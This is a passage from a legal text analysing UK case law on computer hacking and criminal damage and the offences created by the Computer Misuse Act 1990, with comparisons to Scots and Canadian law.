A more recent authority, Denco v Joinson ([1992] 1 All ER 463), illustrates that misuse of computing facilities will generally constitute gross industrial misconduct justifying summary dismissal of the employee responsible. In many cases this may be considered the most appropriate response to instances of this kind, a view supported by surveys of computer misuse conducted by the Audit Commission for England and Wales. Even in cases of fraud involving computer systems, prosecutions resulted in only 42% of cases[23]. In Cox v. Riley, however, criminal charges were brought alleging breach of section one of the Criminal Damage Act 1971. This states:

A person who without lawful excuse destroys or damages any property belonging to another intending to destroy or damage any such property .. shall be guilty of an offence. (Section 1)

The word "property" is defined as "property of a tangible nature whether real or personal." (Section 10)

The appellant, having been convicted before the Magistrates, appealed on the point whether damage to property had occurred. No damage had been caused to any piece of physical property. Although the contents of the printed circuit card had been erased, it remained a viable storage device. Upholding the conviction, the Divisional Court held that the requirement of damage to property had been satisfied in that the owner of the saw, which was unquestionably property for the purpose of the statute, had been required to expend time and effort of a more than minimal amount in order to restore it to its original condition, i.e. a saw capable of cutting in accordance with the instructions contained in a computer program.

Basing the offence upon the effort required to return property to its original condition does not appear conceptually inconsistent with other forms of conduct. In the event that a person sprays paint on a wall, there is no doubt that the offence will have been committed. The wall, however, will not have been destroyed or weakened in any way and remains fit for its purpose. The only cost incurred will be that which has to be met by the owner in returning it to its original condition as a structure free from unwanted artistic works.

In the Scottish case of HMA v. Wilson (1984 SLT 117) a similar approach was adopted in respect of the equivalent offence of malicious mischief. The case concerned a nuclear power station rather than a computer, it being alleged that the respondent had maliciously pushed an emergency stop button thereby causing cessation of electricity generation and a loss to his employers estimated at £147,000. The emergency stop button reset itself automatically and the effect of its operation was to stop the generating machinery in a normal and non-damaging fashion. The only loss suffered was economic in nature. Reversing the finding of the Sheriff that the charge was irrelevant, the High Court ruled (Lord Stewart dissenting) that conduct depriving the owner of property of the opportunity to use it "productively and profitably" sufficed to found a charge of malicious mischief.

The application of the offence of criminal damage to computer related conduct was again at issue in the case of R v. Whiteley ((1991) 93 Cr App Rep 25). This case is of considerable interest in that it was concerned with what might be regarded as classic attributes of computer hacking. Reference has previously been made to computer networks. The computing facilities at most United Kingdom institutes of higher education are linked in a network referred to under the acronym JANET (Joint Academic NETwork). The communications facilities associated with this network allowed a user connected at one site to obtain access to any other JANET site. Access to the network was controlled by passwords. Although Whiteley had no entitlement to access the system, the culture within academic computing facilities in the 1980s was such that security was not afforded high priority. The initial act of obtaining access to a computer system would not have been very difficult and the appellant was able to secure this using a very cheap and basic personal computer and modem set up in his home.

It is clear from the account given above that Whiteley's conduct had caused considerable inconvenience and not a little expense to the operators of the computer facilities affected and to other, authorised, users of the systems. Two charges were brought under the provisions of the Criminal Damage Act, the first alleging damage to the computers by virtue of their operations being stopped for periods of time, the second alleging damage to the discs (sic) which held the programs and data used in the computers. These discs are constructed to contain millions of magnetic particles which provide a medium for the recording of information in much the same way as a piece of paper can be written on. The effect of "writing" data to a disk is to produce particular combinations of magnetic polarity. These correspond to the binary symbols which form the basis of all digital computer operations. Whiteley's activities, it was argued, altered the make-up of magnetic particles causing impairment to the operation of the computer systems and thereby committing the offence of criminal damage.

The charge of criminal damage to the computers was dismissed by the jury, a verdict with which the Court of Appeal indicated their approval. A conviction on the second count, for which Whiteley was sentenced to a term of 12 months imprisonment, was the subject of the appeal, it being argued that the Criminal Damage Act required that damage be tangible. This contention was rejected by the Court of Appeal, the Lord Chief Justice (Lane) stating:

It seems to us that that contention contains a basic fallacy. What the Act requires to be proved is that tangible property has been damaged, not necessarily that the damage itself should be tangible. There can be no doubt that the magnetic particles upon the metal discs were a part of the discs and if the appellant was proved to have intentionally and without lawful excuse altered the particles in such a way as to cause an impairment of the value or usefulness of the disc to the owner, there would be damage within the meaning of section 1. The fact that the alteration could only be perceived by operating the computer did not make the alterations any the less real, or the damage, if the alteration amounted to damage, any less within the ambit of the Act.

... If the hacker's actions do not go beyond, for example, mere tinkering with an otherwise "empty" disc, no damage would be established. Where, on the other hand, the interference with the disc amounts to an impairment of the value or usefulness of the disc to the owner, then the necessary damage is established.

The decision in Whiteley represents authoritative endorsement of the view that an act causing amendment to data held on a computer storage device can constitute the offence of criminal damage. However, by the time the decision was handed down, the Computer Misuse Act 1990 was in force. Acting on the expressed opinion of the Law Commission that:

... the practical meaning of damage has caused practical as well as theoretical problems ... evidenced by the experience of the police and prosecuting authorities who have informed us that, although convictions have been obtained in serious cases of unauthorised access to data or programs, there is recurrent (and understandable) difficulty in explaining to judges, magistrates and juries how the facts fit in with the present law of criminal damage. (Computer Misuse, 1989)

the Computer Misuse Act amended the Criminal Damage Act, providing in section 3(6) that:

For the purposes of the Criminal Damage Act 1971 a modification of the contents of a computer shall not be regarded as damaging any computer or computer storage medium unless its effect on the computer or computer storage medium impairs its physical condition.

The provisions of the Computer Misuse Act will be discussed in more detail below. Two comments may be made at this stage concerning the approach adopted. First, nowhere does the 1990 Act make any amendment to Scots criminal law. There would appear no reason why a charge of malicious mischief or vandalism could not continue to be brought in respect of computer related conduct. A second point to note is that the amendment to the Criminal Damage Act applies in respect of "the contents of a computer". Although this definition includes any disks or other forms of storage medium which are permanently or temporarily incorporated in a computer, the Act does not apply to a storage device per se. In the event that an unauthorised person placed a magnet in close proximity to a disk thereby causing the loss of any data held on it, no offence would be committed under the Computer Misuse Act as the disk could not be regarded as forming a part of a computer at the relevant time. Any prosecution would have to have recourse to the maligned Criminal Damage Act (as indeed would any prosecution based on the allegation that the contents of an audio or video tape had been erased). Such a dichotomy appears likely to perpetuate the educative problems referred to by the Law Commission. It cannot be considered satisfactory that conduct which produced exactly the same effect should face different criminal sanctions depending upon the accident whether a disk is in or out of a computer at the relevant time. Especially given the clear pronouncements of the Court of Appeal in Whiteley, it may have been preferable to restrict any amendment to the definition of property in the Criminal Damage Act, making it clear that damage to the contents of any storage device would constitute damage to the device itself.


Unauthorised Access to Data

The essence of the cases and the issues described in the preceding section is that conduct deprives the owner of an object of the opportunity to use it in the manner desired. The next form of conduct to be considered is that whereby an unauthorised person seeks only to obtain access to, and normally a copy of, information held in a computer system. Two situations will be considered in this context. The first occurs when the owner of a data base is willing to make access available upon payment of specified fees only for a party to attempt to access the system whilst evading payment. In the second situation, the data user does not wish to make the information available to the world at large and, again, is the subject of the attentions of a computer hacker.

Undoubtedly the best known case involving the legal response to computer hacking is that of R v. Gold ([1988] AC 1063). Gold, together with his co-accused Schifreen, was a computer hacker. The victim in the case at issue was British Telecom who operated a computer service Prestel. The system consisted of a central computer system which provided a considerable variety of computer related services to its subscribers including electronic mail. Subscribers would be issued with a password and a user identification code. This would allow the system to monitor the extent of their usage and charge them accordingly. Special passwords were issued to British Telecom employees who required to access the system for the purposes of their employment. The attraction of these passwords for a would-be hacker was that they did not cause any bills to be generated. Gold discovered such a password and made extensive use of it before the fact of his conduct was discovered.

If the case had originated in Scotland, there is little doubt that a charge of obtaining services by means of a false pretence would have been competent. Such a charge looks at the actions and intentions of the party seeking the service. In this case there seems no doubt that the hackers were seeking to masquerade as authorised users for the purpose of obtaining free access to the services. In England, the Theft Act of 1968 had replaced the concept of false pretence with that of obtaining services by deception. This change followed the recommendations of the Criminal Law Revision Committee whose eighth report sought to place greater emphasis upon the effect which conduct had upon its victim. The difficulty with this approach in the computer context is the question whether a machine can be deceived. Although there are no clear dicta on the point, the prevailing opinion appeared to be that the answer lay in the negative. Faced with uncertainty on this critical point, the decision was made to bring charges under the Forgery and Counterfeiting Act of 1981. This Act contained a number of provisions which appeared to make it appropriate for the facts of the case. It provides that an offence is committed by a party who presents a false instrument with the intention that it should be taken as genuine. It is further provided that attempts to deceive a machine should be equated with those affecting a human.

Gold and Schifreen were convicted at trial only for these convictions to be overturned by the unanimous judgments of the Court of Appeal and the House of Lords. The major objection identified by the appellate courts to the application of the Act lay in the difficulty of identifying any instrument which was used. The term "instrument" was defined in the Act as including any "disc, tape, sound track or other device in or on which information was recorded or stored". This, it was held, restricted its application to the situation where there was some physical storage device. In the present case this could only occur where the password details transmitted by the appellants were recorded on the Prestel system. Two objections were taken to such a result. First, largely because of the special nature of the passwords used, no details were maintained beyond the brief period, less than one second, taken for the authenticity of the password to be verified by the system. This, it was held, was too short a period to constitute a recording as required in the Act. The second objection was to the necessary identification of the Prestel computer as both the source of the deception and its victim. A somewhat schizophrenic state of affairs. Most damning perhaps, both tribunals were critical of the attempt to invoke the Forgery and Counterfeiting Act, the Lord Chief Justice commenting:

We have accordingly come to the conclusion that the language of the Act was not intended to apply to the situation which was shown to exist in this case. It is a conclusion which we reach without regret. The Procrustean attempt to force these facts into the language of an Act not designed to fit them produced great difficulties for both judge and jury which we would not wish to see repeated ... The appellants' conduct amounted in essence .. to dishonestly obtaining access to the relevant Prestel data bank by a trick. That is not a criminal offence. If it is thought desirable to do so, that is a matter for the legislature rather than the courts. We express no view on the matter.

The failure of the prosecution in this case was widely regarded as leaving the owners of the burgeoning ranks of commercial data bases exposed to the predatory activities of hackers and served to fuel the existing calls for legislative reform. It is likely that similar conduct might now be prosecuted under the provisions of section one of the Computer Misuse Act 1990.


Theft of Information

In situations such as that at issue in R v. Gold the computer owner's loss may be expressed in terms of the access charges normally levied. In the situation where a user does not wish third parties to obtain access to data, the effect of such conduct may be more serious from the "victim's" perspective than that where data is altered or erased. An efficient user will ensure that "back up" copies are maintained of all programs and data (subject to possible copyright problems as described in chapter four). Destruction of one copy of the data may then cause only temporary inconvenience. As was stated in the recent Canadian case of R v. Stewart (149 D.L.R. (3d) 583):

Compilations of information are often of such importance to the business community that they are securely kept to ensure their confidentiality. The collated, confidential information may be found in many forms covering a wide variety of topics ... For many businessmen their confidential lists may well be the most valuable asset of their company.

A domestic illustration of this phenomenon can be seen in the case of Grant v. Allan (1987 SCCR 402) where the respondent removed a quantity of computer printouts from his employer's premises. The business in question was a parcel and document delivery service and the information on the printouts related to its customers and its pricing policy. The value of such information to a competitor is self-evident. The fact of the accused's conduct came to light when he approached one competitor with the offer to sell the information for £400, this approach subsequently being reported to the police and the accused arrested when he attempted to complete the transaction.

The major difficulty facing any prosecution in such a situation is the perennial issue whether information might be regarded as property sufficient to found a charge of theft. In the English case of Oxford v. Moss ((1978) 68 Cr. App. R. 183) a university student discovered a proof copy of an examination paper which he was due to attempt. He removed the paper with the intention of copying it. Realising that if the paper's absence were discovered a different paper might be set, it was an integral part of his scheme that the copy would be returned. The student was caught in the act of returning the paper. Under the Theft Act 1968, an essential element of the offence was the intention that the owner be deprived permanently of the property involved. This, of course, was not the case and so the student could not be charged with theft of the paper. In the event, a charge was brought alleging theft of the confidential information contained in the paper. It may well be argued, of course, that the "owner" was not deprived of the confidential information although the fact of the student's conduct might be taken as destroying the element of confidentiality. In the event, however, the charge was dismissed by the Magistrates whose finding that confidential information could not be regarded as property under the Theft Act was upheld by the Divisional Court.

Although a different approach has been adopted in a number of cases emanating from the United States where information has been accepted as constituting the subject of theft, these have been derived from a definition of theft significantly different from that applied in England and Scotland[24]. In Canada, although the majority of the Court of Appeals held in the case of R v. Stewart that confidential information could be regarded as property, this view was rejected by a unanimous Supreme Court.

As Oxford v. Moss illustrates, problems involving the property status of information did not await the computer. Espionage is generally regarded as one of the older professions. Although Oxford v. Moss illustrates that this is not always the case, such conduct often involves the perpetrator in the commission of offences involving unauthorised access to property - burglary, obtaining entry to a lockfast place etc. In the situation where information is held on a computer and where access may be obtained by means of a telecommunications link, there is no need for a computer spy to set foot on the premises. In the situation where personal data is involved, salt may even be rubbed into the victim's wounds when they discover that they have committed a breach of the eighth data protection principle requiring the maintenance of adequate security and face the wrath of the Data Protection Registrar. With only limited exaggeration, the consequence may be analogised to prosecuting a house owner whose property has been burgled for failing to secure windows or doors whilst exculpating the burglar.

In the situation where an unauthorised party has secured access to data held on a computer system with the view to obtaining some advantage from this conduct, there has been a widespread recognition that the conduct should attract criminal sanctions as a form of electronic burglary. Both the Council of Europe which produced a report concerning the need for and basic form of computer crime legislation and the Scottish Law Commission made recommendations to this effect, the latter recommending the enactment of a Computer Crime (Scotland) Act. This would create one new offence committed by a person who:

... not having authority to access to a program or data stored in a computer ... obtains such unauthorised access in order to inspect or otherwise to acquire knowledge of the program or the data or to add to, erase or otherwise alter the program or the data with the intention:

(a) of procuring an advantage for himself or another person; or

(b) of damaging another person's interests.

Few might dispute the desirability of prosecuting the theft of data from a computer system on the same basis as existing property related offences. More controversial is the question whether the unadorned act of obtaining access to data held on a computer should be criminalised. The challenge of hacking for many actors, it is suggested, lies in the act of obtaining access to computer systems. Effectively, the goal is to see how far the hacker can travel from their own keyboard. The nature of the information held on any systems visited is of little interest, the journey being the end in itself.

The Scottish and English Law Commissioners disagreed on the question whether unauthorised access should be criminalised. The Law Commission, which in their initial Working Paper had expressed doubt on the point, explained in their final Report that they had changed their opinion following confidential briefings from computer users. These indicated that even though a hacker may not have been acting with any ulterior motive, the conduct could cause serious loss to the user. In the event that it was discovered that an unauthorised party had obtained access to a computer system, the user, it was argued, would very likely be unaware of the extent of the penetration and of any changes which may have been made to the contents of the system. Even inadvertently, an unauthorised user might cause the corruption or erasure of programs or data held on the system, whilst the possibility of deliberate harm, involving perhaps the insertion of logic bombs or the introduction of a computer virus, could never be discounted. A user faced with evidence of unauthorised access would have to assume the worst. In an example cited to and by the Law Commission a user expended some 10,000 hours of staff time rebuilding a computer system on becoming aware that an unauthorised person had obtained access. Faced with such evidence, the Law Commission recommended that the act of obtaining unauthorised access should be criminalised.

Such an approach raises a number of issues of principle which serve to illustrate yet more of the difficulties which the law faces in attempting to regulate aspects of computer related conduct. It has been argued on a number of occasions in this work that the law fails to take adequate account of the fact that intangible property is as valuable an asset as any more tangible commodity. If comparison is made with other forms of property and behaviour it will be seen that the effect of the Law Commission's recommendation is to confer an exalted status upon data held in a computer system. Save under the provisions of the Official Secrets Acts, if confidential information is written on a piece of paper which is left on top of a desk visible through a window, no offence would be committed by a person who looked at the document through the window. No offence indeed would be committed by a person who took a photograph of the document and its contents. Although the situation may be less certain, it is possible that a similar conclusion would apply where a document is left in an unlocked office or house and an unauthorised person entered the premises to read or photograph it. There may, of course, be legal ramifications under the law of copyright, but no criminal offence will be committed. As a general rule, the mere act of obtaining access to property does not constitute an offence. This occurs only where security measures are overcome or where property is damaged or removed.

The argument that criminal sanctions should be imposed because a computer user is put to expense because of a feeling of apprehension that damage may have occurred also appears to lack precedent. If a house owner becomes aware that house keys have disappeared for a period of time and then reappeared, they may well be concerned that an unauthorised party has copied the keys. A reasonable response to this fear might see locks being changed at not inconsiderable expense and inconvenience. Assuming that the person responsible for the keys' removal is discovered and that it transpires that no copy was made, it may be doubted whether any criminal offence has been committed. A more extreme example might see an airline becoming aware that an unauthorised party has accessed a plane's engines. If the response were to be other than grounding the plane pending exhaustive checks, it is likely that the airline would be considered negligent. Again, if it transpired that no damage had been caused, the expense and inconvenience caused would not of itself give rise to any criminal sanctions.


The Computer Misuse Act

Unusually for a measure concerned solely with the imposition of criminal sanctions, the Computer Misuse Act was introduced as a Private Member's Bill. At the time of the Law Commission's report, it was contemplated that legislative proposals might be announced in the Queen's Speech and to facilitate this, the Commission advanced publication of their report to such an extent that it did not follow the normal procedure of appending a draft Bill.

The Computer Misuse Act draws almost entirely upon the Law Commission's Report. Although the legislation applies to Scotland, the work of the Scottish Law Commission was disregarded under the explanation that the rapid pace of change in computer related fields lent extra authority to the more recent deliberations of the English body. Given the radical differences between the two reports and the fact that they were separated by less than 2 years in time, this explanation may not present an optimistic prognosis for the effectiveness of the 1990 Act.

The legislation creates three new offences. Section one renders criminal the attempt to obtain unauthorised access to programs or data held on a computer. Section three applies in the situation where the contents of a computer system are subjected to an unauthorised modification. Section two attempts to deal with another aspect of computer related behaviour, namely the speed with which conduct can move from preparation to perpetration. Under the normal law of criminal attempts, a person can only be charged with an attempted offence when they move beyond the stage of preparing to commit an offence to that of attempting to put the plans into practice. The dividing line between preparation and perpetration has always proved a difficult one to draw but the argument was accepted by the Law Commission that the speed with which operations might be accomplished using a computer was such as to justify bringing forward the moment in time at which a serious criminal offence is committed. The calculation has been cited earlier that the foreign currency reserves could be transferred electronically in 15 minutes. Attempting to discover the combination of a bank safe is some way removed from the attempt to stage a robbery. Attempting to discover the codes and combinations used to effect an electronic fund transfer may leave the party involved with only a minor amount of work to do in order to complete the criminal scheme. The attempt to discover the codes might be considered as analogous to the attempt to use the knowledge of the combination to open the safe in the more old fashioned example.

Although the above example provides reasonable justification for legislative intervention, a further hypothesis advanced by the Law Commission reveals a difficulty associated with ad hoc and computer specific legislation. This example concerned the situation when a hacker attempted to gain access to the computerised medical records of patients suffering from the AIDS virus with the intention of using the information acquired for blackmail purposes. The Commission postulated that at the stage of attempting to obtain access, the scheme would not have advanced sufficiently to found a charge of attempted blackmail. Accepting that this is the case, the question may be put how far the involvement of the computer serves to change anything. In the banking example cited above, it is clear that the computerised robber is enabled to advance the criminal scheme to a greater extent than his or her traditional counterpart. The computerised blackmailer secures no similar advantage. As has been said in the context of the Data Protection Act, the fact of the computer's involvement is purely fortuitous.


The Unauthorised Access Offence

The preceding discussion has concentrated upon the desirability of making unauthorised access illegal per se. Attention will now be given to the likely effectiveness of the approach adopted within the Computer Misuse Act.

Section one provides that a person shall be guilty of an offence if:

(a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer;

(b) the access he intends to secure is unauthorised; and

(c) he knows at the time when he causes the computer to perform the function that this is the case.

Commission of the unauthorised access offence attracts a maximum penalty of a six month term of imprisonment and a fine of £2,000. This amount is twice that recommended by the Law Commission.

A number of features of the offence call for comment. In common with the generally adopted approach, no attempt is made to define the word computer. Given the proliferation of micro-processors in every day appliances such as motor cars, washing machines and video recorders the ambit of the legislation is exceptionally broad.

The two key elements of the definition are the requirement that the attempt be made to cause a computer to perform a function with the intention that this should enable access to be secured to any program or data stored in it. These phrases are themselves the subject of extensive definitions. Effectively, any action which causes the computer to operate in any way will come within the scope of section one. In particular, access will be obtained to a program held in a computer when the program operates. It is not necessary that the user should see the program in question or that its operation should be internal to the computer. An example might concern a washing machine controlled by micro-processors. Any person using the washing machine would cause their operation, thereby obtaining access to the programs involved. If the use of the machine was unauthorised, a section one offence might be committed. Such a conclusion has to be set alongside the general rule that unauthorised use of an object is not, per se, criminal.

An offence will only be committed if the party seeking access knows that his or her efforts are unauthorised. Paradoxically, this may be more readily established in the case of unauthorised use of a washing machine than of a computer. The question whether access is unauthorised will be determined by reference to the state of mind of the computer owner or of the person entitled to control access. In the case of computerised library catalogues where terminals are located throughout the library it is likely to be the case that access is authorised to the world at large - or at least that portion entitled to enter the library. In other cases, the user may wish to authorise much more limited access and it may well be that the intention would be that no other person should be authorised to use the equipment. It should be stressed that decisions are to be made by a person entitled to control access. If a person is allocated a password allowing access to the system and reveals details of this to a third party thereby enabling them to obtain access, that access will be unauthorised as the party disclosing the necessary information is not authorised to control access. Instances have been reported of computer bulletin boards displaying details of telephone numbers and passwords enabling access to be obtained to specific systems. The fact that the details are genuine will not make any subsequent use authorised.

The intention of the user is only one element of the statutory equation. In order to secure a conviction it must be established that an accused knew that his or her access was unauthorised. In the situation where access is obtained to the physical components of a computer, e.g. the user sits in front of and uses a keyboard attached to the computer, the question whether there was knowledge that access is unauthorised will be closely linked to that of whether the presence on the premises involved was authorised. Matters may not be resolved so simply when access is obtained remotely. This is more in line with the stereotypical view of hackers. The evidentiary burden of establishing knowledge that access was unauthorised is a heavy one. The fact that a party should have suspected that their attentions were unwanted would not suffice. Given the lack of case law under the 1990 Act any comment in this area must be speculative but the scenario will be considered in which a hacker has been given a telephone number corresponding with a computer system and connects to the system. At that stage it is most unlikely that an offence will be committed under section one. The first point of contact with a computer system is normally via a 'log in' screen. This will normally identify the system. At this stage the hacker may suspect that they are not authorised to make use of the system but suspicion may fall short of knowledge. It may well be that the log in screen will also make reference to the provisions of the Computer Misuse Act and state specifically that unauthorised access constitutes a criminal offence. It may well be that the inclusion of such a warning will suffice to establish the guilt of a person who has no access right but who seeks to move from the log in screen to explore the contents of the system itself.

Few computer systems of any significance will rely only upon warning notices as means for keeping unauthorised users at bay. In the same way as a house-owner will use locks and possibly burglar alarms, so security precautions will be built into the system. Typically, these involve allocating passwords to authorised users and requiring these to be inserted prior to allowing access to proceed. Although it may be likely that sight of a demand for a password should signify to a user that their presence is unauthorised, in some cases the requirement for a password is a matter of form rather than substance. Some systems will allow a user to obtain access using a password such as "guest" or "anonymous". Other systems (or system managers) impose very lax control over the choice of passwords. In the case of Denco v. Joinson, for example, a Welsh employee selected the password "Taff". In the seminal case of R v. Gold, the access information discovered by the accused was in two stages. First came a password which in this case consisted of the number 2 repeated eight times. This required to be followed by a user identification code which used the number 1234.

The difficulty of establishing knowledge will be even greater when a user possesses limited access rights but where the allegation is that these have been exceeded. Typically, this may occur in an employment relationship. In Denco v. Joinson for example, the appellant had been granted limited access to the computer system in connection with his employment as a metal worker but allegedly sought to access information relating to the firm's customers, information which fell outwith the scope of his access rights. The appellant's conduct in this case was compounded by the fact that he had made use of a password allocated to another employee. The computer culture existing within the workplace may be a matter of some importance in this respect. It was reported in Denco that in the initial stages of computerisation, management encouraged employees to make use of the computer even though this was not required for the performance of their duties. In such a climate, it might be difficult to establish the requisite knowledge.

The decision to make unauthorised access an offence has been criticised as marking an unwarranted extension to the criminal law. In practice, the manner in which it has been implemented in the Computer Misuse Act may render the issue of little practical importance. The most difficult issue occurs when a user displays clear and unequivocal notices warning that unauthorised users are not welcome but takes no further security measures to prevent access. In such a situation, an offence may well be committed under the Act but it is difficult to reconcile this situation with the doomsday scenarios postulated by the Law Commission in which users, fraught with concern at the possible damage caused by intruders, incur enormous expenditure in rebuilding the system. The fact that users have been lax in incorporating or applying security precautions should not be seen as grounds for refusing protection. The fact that a lock can be forced easily does not provide any defence for a party so acting. By extending so wide the scope of the prohibition, the Act may protect those who might be considered little deserving but by imposing the requirement of establishing knowledge may deny protection to those whose genuine attempts at maintaining security are defeated by conduct which may fairly be stigmatised as negligent or reckless but which might not readily be characterised as intentional. The issue will always be one of fact, but it may be difficult to ascribe knowledge to a hacker who was given access details by a friend or even found them on a bulletin board.


The Ulterior Intent Offence

As stated above, the goal of this offence is to bring forward in time the moment at which a serious criminal offence is considered to have been committed. To effect this, it is provided that:

A person is guilty of an offence under this section if he commits an offence under section 1 above (the unauthorised access offence) with intent-

(a) to commit an offence to which this section applies; or

(b) to facilitate the commission of such an offence (whether by himself or any other person).

The offences referred to in paragraph (a) are those for which a term of imprisonment of 5 or more years might be imposed upon a person with no previous criminal record.

Commission of the unauthorised access offence is a pre-requisite for commission of the ulterior intent offence. This may serve to limit the practical utility of the new provision. Over the last decade, the Audit Commission have conducted triennial surveys attempting to discover the extent of the losses resulting from computer fraud and other forms of computer misuse. In most of the cases reported to them, the losses resulted from internal causes. Although not included in these surveys, the case of R v. Thompson might be regarded as indicative of the behaviour involved.

Thompson was employed as a computer programmer by a bank in Kuwait. His work gave him access to the computer systems which held details of customers' accounts. Thompson devised a fraudulent scheme which involved programming the computers to transfer sums from such accounts into other accounts which he had opened in his own name. In an effort to avoid detection the transfers were not to be effected until Thompson had left the bank's employ and was literally on a plane returning to England. Upon his return, Thompson attempted to realise his gains by causing the apparent contents of his accounts to be transferred to another account which he had opened with an English bank. It was at this point that his conduct was discovered and Thompson was charged with obtaining property by deception.

The major legal point in this case concerned the question whether the English courts had jurisdiction in the matter, Thompson arguing that any offence had been committed in Kuwait. Rejecting this claim, the Court of Appeal held that the offence was committed only when Thompson secured control of the funds involved. Merely causing a credit balance to appear on his bank accounts did not suffice.

The facts in Thompson indicate the justification for the ulterior intent offence. Although a conviction was obtained, the effect of the decision would be to leave a bank vulnerable - or at least denied the protection of significant elements of the criminal law - until a fraudulent scheme was within seconds of completion. The difficulty might be to determine that Thompson, or any other employee in a similar position, had committed the unauthorised access offence. A distinction exists between unauthorised access and unauthorised use of access. Although much will once again depend upon the facts of a particular case, it may be difficult to establish that an authorised user has stepped sufficiently far outside any access rights as to commit the unauthorised access offence.

In the situation where the unauthorised access offence is committed with the requisite ulterior intent, this latter offence will also be committed even though it should transpire that it would be impossible to commit the later offence. An example might concern a person attempting to obtain access to codes or passwords used by a bank to authenticate electronic fund transfers without realising that further security measures would mean that possession of these items of information would not suffice to cause a transfer to be made.

The world-wide nature of telecommunications facilities brings a significant international dimension into all aspects of computer related conduct. In terms of the jurisdiction of the United Kingdom authorities, the basic provision is that jurisdiction may be claimed either when the party involved or the victim computer system is located within a domestic jurisdiction. This poses comparatively few definitional problems concerning the unauthorised access offence or with the unauthorised modification offence which will be considered in more detail below. Matters are not so straightforward where the conduct which allegedly constitutes the ulterior intent offence possesses an international dimension. The case of Thompson again provides an apposite illustration of such a situation. The approach adopted in the Computer Misuse Act is to confer jurisdiction upon the relevant domestic tribunals both where all aspects of the conduct occur within the jurisdiction and where it is intended to commit the further offence in some other jurisdiction subject to the condition that the conduct would be regarded as possessing a sufficient element of criminality in the relevant legal system. In cases of fraud or theft it is likely that these requirements will be satisfied almost regardless of where the conduct is envisaged to occur. The position may be more complicated where the further offence relates to damage to data, perhaps by disseminating a computer virus. It will be recalled that the Law Commission expressed concern at the problems encountered in the application of the existing provisions of the Criminal Damage Act. Where other jurisdictions have not enacted any form of computer misuse statute, it may be that difficulties will be encountered in establishing that the conduct is regarded as criminal in the jurisdiction involved.


The Unauthorised Modification Offence

The third new offence created by the Computer Misuse Act is designed to substitute for the invocation of the Criminal Damage Act. The offence will be committed by a person who intentionally commits any act which alters the contents of a computer system in such a manner as to impair its operation. Once again, it is to be noted that the offence may be committed only by a party who acts intentionally. Negligent or even reckless conduct will not suffice.

In order to commit the offence it is not necessary that a party makes any form of contact with a computer. A person who creates a computer virus and puts it into circulation will, assuming the necessary intention can be established, commit the unauthorised modification offence in respect of each computer system affected.

Few would dispute the validity of the attempt to impose criminal sanctions upon those who seek deliberately to impair the operations of a computer system. As stated above, programs and data are protected under the Computer Misuse Act only whilst they are stored in a computer system. It is arguable that the provision is framed sufficiently broadly to encompass forms of activity which would not normally be considered as criminal. The example might be cited of a person who types a personal letter using a word processing system belonging to his or her employer. By adding data to the contents of the system, a modification is undoubtedly being performed. The user must be taken to have intended to make such a modification. It is immaterial for the purposes of the Act whether the modification is permanent or merely temporary. All that remains is the question whether the modification has impaired the operation of the computer system. The answer to this may depend upon the nature of the computer system and the fact whether the employee causes a copy of the letter to be retained on the system. In general, however, the more data is held on a computer, the slower will be its functioning - even though the diminution in performance may not be perceptible to an ordinary user. The Act does not require that impairment be significant and, in principle, there would appear no reason why a charge should not be brought in such an instance. Given that mere use of property is not generally regarded as constituting a criminal offence, the effect may again be to put a computer owner in a specially protected position.


Conclusions

As more and more reliance is placed upon the computer in legitimate activities, so it may be likely that it will serve increasingly both as a target of and tool for those whose motives and aspirations might generally be regarded as criminal. The Computer Misuse Act marks the first attempt to introduce specific controls but this approach carries with it the danger that it may treat as the exception, activities which are becoming the rule. Certainly, the involvement of the computer may add new dimensions to existing topics but the most urgent need is to concentrate upon the substance of the conduct rather than the accident whether a computer is involved. The Home Affairs Committee of the House of Commons have recently published the report of their investigation into the topic of computer pornography (House of Commons Paper 126. Session 1993-4). Although it may be that the interactive possibilities made available in computer programs represent a novel feature, conceptually, the manner in which information is generated and recorded should have nothing to do with the determination whether it is pornographic or not. One point that is well made in the evidence submitted to the Committee by the Greater Manchester police is that the ease with which data - in this case graphical images - may be transmitted by means of the telephone system, imposes substantial limitations upon national law enforcement agencies. After observing that the United Kingdom's obscenity laws are more stringent than those prevailing in most other countries it comments "It is highly unlikely that the international community will alter their obscenity laws. We will be faced with the situation that if it is available somewhere, it will be available everywhere".

Responsibility for criminal matters has traditionally been regarded as a national matter. Even the European Union's reach, for example, does not extend into the sphere of criminal law. Cyberspace, however, is no respecter of national boundaries. The examples cited above indicate that as in other areas of law, there is urgent need for international co-operation and co-ordination. The comments of the Home Affairs Committee indicate that this may be no simple task.

